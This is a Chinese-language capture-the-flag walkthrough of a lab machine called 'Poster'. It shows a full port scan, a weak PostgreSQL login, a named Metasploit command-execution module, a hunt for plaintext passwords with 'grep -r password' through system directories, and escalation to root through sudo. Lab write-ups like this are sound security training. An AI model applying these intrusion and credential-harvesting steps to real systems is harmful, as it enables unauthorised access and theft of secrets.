Poster
The sys admin set up a rdbms in a safe way.
0x01 简介
什么是rdbms?
根据EF-Codd关系模型,RDBMS允许用户构建、更新、管理和与关系数据库交互,关系数据库将数据存储为表。
当前,一些公司使用关系数据库代替平面文件或层次数据库来存储业务数据。这是因为关系数据库可以处理范围广泛的数据格式并有效地处理查询。此外,它将数据组织到可以基于公共数据进行内部链接的表中。这允许用户通过单个查询轻松检索一个或多个表。另一方面,平面文件将数据存储在一个表结构中,这会降低效率并消耗更多的空间和内存。
大多数商用RDBMS目前都使用结构化查询语言(SQL)来访问数据库。RDBMS结构最常用于执行CRUD操作(创建、读取、更新和删除),这对于支持一致的数据管理至关重要。
0x02 信息收集
先用rustscan联动Nmap扫描目标机器端口
dd@kalikali-123:~$ rustscan -a 10.10.217.90 -r 1-65535 --ulimit 5000 -- -A
[~] Automatically increasing ulimit value to 5000.
Open 10.10.217.90:22
Open 10.10.217.90:80
Open 10.10.217.90:5432
[~] Starting Nmap
[>] The Nmap command to be run is nmap -A -vvv -p 22,80,5432 10.10.217.90
Starting Nmap 7.70 ( https://nmap.org ) at 2021-03-10 06:23 UTC
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 06:23
Completed NSE at 06:23, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 06:23
Completed NSE at 06:23, 0.00s elapsed
Initiating Ping Scan at 06:23
Scanning 10.10.217.90 [2 ports]
Completed Ping Scan at 06:23, 0.27s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 06:23
Completed Parallel DNS resolution of 1 host. at 06:23, 0.02s elapsed
DNS resolution of 1 IPs took 0.02s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 06:23
Scanning 10.10.217.90 [3 ports]
Discovered open port 22/tcp on 10.10.217.90
Discovered open port 80/tcp on 10.10.217.90
Discovered open port 5432/tcp on 10.10.217.90
Completed Connect Scan at 06:23, 0.27s elapsed (3 total ports)
Initiating Service scan at 06:23
Scanning 3 services on 10.10.217.90
Completed Service scan at 06:23, 7.61s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.217.90.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 06:23
NSE Timing: About 99.76% done; ETC: 06:23 (0:00:00 remaining)
NSE Timing: About 99.76% done; ETC: 06:24 (0:00:00 remaining)
NSE Timing: About 99.76% done; ETC: 06:24 (0:00:00 remaining)
Completed NSE at 06:24, 95.27s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 06:24
Completed NSE at 06:24, 0.00s elapsed
Nmap scan report for 10.10.217.90
Host is up, received conn-refused (0.27s latency).
Scanned at 2021-03-10 06:23:12 UTC for 104s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 71:ed:48:af:29:9e:30:c1:b6:1d:ff:b0:24:cc:6d:cb (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDGK2azIgGLY4GFFZlpgMpyOub/To5vmftSEWkjbtFkTBvc5tW/SpoDtjyNMT0JKJUmFJ2/vp6oIpwyIRtDa+oomuNL//exbp/i798hl8FFo4Zq5HsDvQCwNKZ0lfk0HGYgbXj6WAjohokSbkDY1U26FN/MKE2JxcXLcN8n1QmvVbP5p8zO/jgrXvX6DLv4eHxJjhzsBJ6DwFMchtBwy4CiTQsiCUcAyyua93LJO6NEnnM4SOwOUE/wyggCNPbwzB1wzPLAgaiU+M2gn9/XZGmlD+vWOBu3sruCB2PnRuM3cx27gDbbElR4KDIOq2ar66rV+yIZQoQ7KfVUNUFFCbRz
| 256 eb:3a:a3:4e:6f:10:00:ab:ef:fc:c5:2b:0e:db:40:57 (ECDSA)
|_ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBN2f/wWkOMnH6rNZ+0m2p+PrzBVbz/vfQ/k9rx9W27i9DLBKmRM2b2ntmg8tSwHhZVTb/FvStJci9SIBLAqao00=
80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Poster CMS
5432/tcp open postgresql syn-ack PostgreSQL DB
| fingerprint-strings:
| SMBProgNeg:
| SFATAL
| C0A000
| Munsupported frontend protocol 65363.19778: server supports 1.0 to 3.0
| Fpostmaster.c
| L2015
|_ RProcessStartupPacket
| ssl-cert: Subject: commonName=ubuntu
| Issuer: commonName=ubuntu
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-07-29T00:54:25
| Not valid after: 2030-07-27T00:54:25
| MD5: da57 3213 e9aa 9274 d0be c1b0 bbb2 0b09
| SHA-1: 4e03 8469 28f7 673b 2bb2 0440 4ba9 e4d2 a0d0 5dd5
| -----BEGIN CERTIFICATE-----
| MIICsjCCAZqgAwIBAgIJAIrmTOUt3qZtMA0GCSqGSIb3DQEBCwUAMBExDzANBgNV
| BAMMBnVidW50dTAeFw0yMDA3MjkwMDU0MjVaFw0zMDA3MjcwMDU0MjVaMBExDzAN
| BgNVBAMMBnVidW50dTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMca
| tkPhi1xPkNomQzkTX+XRDk0RPBxRJQm17+Q8sru8J72rToPVyZesM7v5M+ttfqlZ
| sHAevEv/iVb1D6hNPawU9kG61Ja9baHd1s31H7RjWxpMS2vZuiu6/oXNWpc4yinQ
| RDWgLqKhDzczacMWLxKkgh06H8DI04/4pCJ6pbf6gXFfVRrccOu1FmoVlWWdVeGd
| CZ2C8XOA1tEEE6UG9HI9Q2gd3AHOSex+ar3EnWm1LanYDQPJSXEgl/K2A9D5DQEw
| +xJxPnH9abqxUrLUDOxzbMpdqXfb0OHxy7jeBJhpd6DonAZTEACdsgh9SzssH4ac
| FOqjsJjfSzok3x3uBx0CAwEAAaMNMAswCQYDVR0TBAIwADANBgkqhkiG9w0BAQsF
| AAOCAQEAxGskqCN0uihEe1rpb7fveGYGMhDsFso9aYdJ4Q3CHJHX3leCN92nLCOq
| R9bTRgVjrvph00jO3+qhHzXCLbnpZXu9R9mPsfcDU/IFCFxMNmjRs4DkkzpGWAyp
| t5I18Zxh4JWJP7Mf1zc39z2Zk/IucAI5kMPMDJUWR/mjVFG/iZY8W+YlKsfvWblU
| tY4RYFhVy9JTVFYe5ZxghLxylYi+cbkGcPMj7qaOkDWIWhILZX1DDAb7cSfVd4rq
| 2ayWhA4Dh/FJkL2j+5mfAku0C7qMAqSlJTMRa6pTQjXeGafLDBoomQIIFnhWOITS
| fohtzsob6PyjssrRoqlRkJLJEJf2YQ==
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port5432-TCP:V=7.70%I=7%D=3/10%Time=604865D8%P=x86_64-pc-linux-gnu%r(SM
SF:BProgNeg,85,"E\0\0\0\x84SFATAL\0C0A000\0Munsupported\x20frontend\x20pro
SF:tocol\x2065363\.19778:\x20server\x20supports\x201\.0\x20to\x203\.0\0Fpo
SF:stmaster\.c\0L2015\0RProcessStartupPacket\0\0");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 06:24
Completed NSE at 06:24, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 06:24
Completed NSE at 06:24, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 104.86 seconds
根据端口信息,先从postgresql入手,启动MSF。。。
搜索对应的漏洞,先枚举一下数据库用户,获得弱口令用户:
postgres:password
0x03 PostgreSQL漏洞利用
搜索其它利用模块进行攻击,这里#13有个cmd命令执行模块,尝试利用一下。
exploit/multi/postgres/postgres_copy_from_program_cmd_exec
配置好选项直接就返回了shell数据库用户权限
0x04 USER权限
这里翻用户家目录在drak用户的目录下发现credentials.txt
里面有drak用户的账号密码
ssh登录drak用户
接着又在网站目录的config.php中反倒alison的密码。一般翻下家目录、网站目录、/tmp、/opt、/etc可以用grep -r password搜索一遍
0x04 ROOT权限
切换到alison用户,根据上面的config.php提示可能有sudo权限、用sudo -l查看sudo权限。
sudo su root 直接切换到root